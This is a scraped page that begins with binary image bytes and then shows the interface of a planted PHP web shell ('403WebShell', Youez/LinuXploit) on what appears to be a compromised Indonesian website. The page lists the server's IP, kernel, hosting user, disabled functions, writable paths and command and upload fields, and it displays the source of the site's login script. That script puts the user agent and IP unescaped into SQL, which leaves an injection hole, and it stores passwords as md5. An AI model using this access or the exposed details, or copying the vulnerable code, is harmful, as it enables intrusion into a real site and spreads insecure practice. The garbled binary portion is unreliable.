JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 2.57.91.42  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html//IDI/action_342023.php
<?php

  ob_start();

?>

<!DOCTIPE html>

<html>

<head>

<meta charset="utf-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <meta name="description" content="">

    <meta name="author" content="">

    <link rel="icon" href="assets/img/icon.png">



    <title>IDI</title>





</head>

<body>

<?php

session_start();



include "koneksi.php";

// VARIABEL ini akan memastikan bahwa inputan user tidak mengandung ciri ciri tindakan SQL Injection

$username = mysqli_real_escape_string($konek, $_POST['username']);

$p = mysqli_real_escape_string($konek,md5( $_POST['password']));

	

//$p1 = trim($_POST['password']);

//$username = trim($_POST['username']);

//$p = md5($p1);





//$username = $_POST["username"];

//$p = md5($_POST["password"]);



$sql = "select * from mahasiswa where npm='".$username."' and password='".$p."' and status='aktif' limit 1";

$hasil = mysqli_query ($konek,$sql);

$jumlah = mysqli_num_rows($hasil);





	if ($jumlah>0) {

		$row = mysqli_fetch_assoc($hasil);

			

				if($row['level']=='admin'){

					$_SESSION['username'] = $username;

					$_SESSION['status'] = "login";

					

					$_SESSION['level']= "admin";

					$_SESSION['npm']= $row['npm'];

					$_SESSION['nama_mhs']= $row['nama_mhs'];

					header("Location:../admin/dashboard.php");



				}else if($row['level']=='user'){

					$_SESSION['npm']= $row['npm'];

					$_SESSION['nama_mhs']= $row['nama_mhs'];

					$_SESSION['level']= "user";

					

					

					 // jika tombol login telah diset/ diklik



// $_SESSION["npm"] = $row['npm']; // didapatkan dari inputan Username





 //$_SESSION["last_login_timestamp"] = time(); // waktu model UNIX

					

					

					date_default_timezone_set("Asia/Jakarta");

					    $agent=@$_SERVER[HTTP_USER_AGENT];

					   	$ip=@$_SERVER['REMOTE_ADDR'];

					

							mysqli_query($konek, "INSERT INTO user_log(npm,ip,agent,waktu)

							VALUES('$row[npm]','$ip','$agent',now())");

						  //user login update status

					/* set default timezone */



					$waktu = date('Y-m-d H:i');

;

			$update = mysqli_query($konek, "UPDATE mahasiswa SET login='Y',waktu='$waktu',ip='$ip',agent='$agent' WHERE npm='$row[npm]'");//kalo pake enum("Y","N")	

			

		//	$query = mysqli_query($konek, "SELECT import FROM h_anggota where npm='$row[npm]'  ");

				//	$data = mysqli_fetch_array($query);

					

					IF( $row['active']== 1){

						// header("Location:project/data_pri.php?npm=$row[npm]");

						 header("Location:anggota/cek_data.php?npm=$row[npm]");

					

					}else{

					//header('Location:project/index.php');

					header('Location:anggota/index.php');

					}

				

				// cek jika user login sebagai pengurus

				}else if($row['level']=='supervisor'){

										$_SESSION['npm']= $row['npm'];

										$_SESSION['project']= $row['project'];

										$_SESSION['nama_mhs']= $row['nama_mhs'];

										$_SESSION['level']= "supervisor";

										$_SESSION['status'] = "login";

										$_SESSION['jabatan'] = "jabatan";

										header('Location:superadmin/dashboard.php');

					

					}else if($row['level']=='pengurus'){

										$_SESSION['npm']= $row['npm'];

										$_SESSION['project']= $row['project'];

										$_SESSION['nama_mhs']= $row['nama_mhs'];

										$_SESSION['level']= "pengurus";

										$_SESSION['status'] = "login";

										//header('Location:pengurus/index.php');
										IF( $row['npm']== '010'){
						 				header("Location:pengurus/index010.php?npm=$row[npm]");
																		
					       					}else{
					     					header('Location:pengurus/index.php');
										}




				     }else if($row['level']=='anggota'){

										$_SESSION['npm']= $row['npm'];

										$_SESSION['nama_mhs']= $row['nama_mhs'];

										$_SESSION['level']= "user";

										

										IF( $row['active']== 1){

						 header("Location:anggota/cek_data.php?npm=$row[npm]");



						

					       }else{

					     header('Location:anggota/index.php');

					}

					}else if($row['level']=='nonang'){

										$_SESSION['npm']= $row['npm'];

										$_SESSION['nama_mhs']= $row['nama_mhs'];

										$_SESSION['level']= "nonang";

						

					     header('Location:nonanggota/index.php');

										

									

										

				}else if($row['level']=='baru'){

										$_SESSION['npm']= $row['npm'];

										$_SESSION['project']= $row['project'];

										$_SESSION['nama_mhs']= $row['nama_mhs'];

										$_SESSION['level']= "baru";

										header('Location:baru/cek_data.php');

										

										IF( $row['active']==1){

										$_SESSION['npm']= $row['npm'];		

										header('Location:baru/cek_data.php');

								       }else{

										$_SESSION['npm']= $row['npm'];		

					     				header('Location:baru/reg_baru.php');

										}

										

				}else if($row['level']=='superadmin'){

										$_SESSION['username'] = $username;

										$_SESSION['npm']= $row['npm'];

										$_SESSION['nama_mhs']= $row['nama_mhs'];

										$_SESSION['level']= "supervisor";

										$_SESSION['status'] = "login";

										$_SESSION['jabatan'] = $row['jabatan'];

										IF( $row['npm']== 004){
						 				header("Location:superadmin/dashboard004.php?npm=$row[npm]");
										}else if( $row['npm']== 005){
										header('Location:superadmin/dashboard005.php');	
										}else if( $row['npm']== 006){
										header('Location:superadmin/dashboard006.php');
										

					       					}else{
					     					header('Location:superadmin/dashboard.php');
										}




				}else if($row['level']=='cross'){

										$_SESSION['username'] = $username;

										$_SESSION['npm']= $row['npm'];

										$_SESSION['nama_mhs']= $row['nama_mhs'];

										$_SESSION['level']= "cross";

										$_SESSION['status'] = "login";

										header('Location:baru/crosscut.php');						

										

	}else {

		echo "Username atau password salah <br><a href='login2.php'>Kembali</a>";

		

			echo "<script class ='merah'>window.alert('Notif: Username atau password salah')

				          window.location='login2.php'</script>"; 

	}

	}else{

		echo "<script class ='merah'>window.alert('Notif: Username,Password salah..') window.location='login2.php'</script>";

		

	header("location:login2.php?pesan=Login gagal,Username Atau Password salah..!");

	

	

}

?>

</body>

</html>

<?php

  ob_end_flush();

?>

Youez - 2016 - github.com/yon3zu
LinuXploit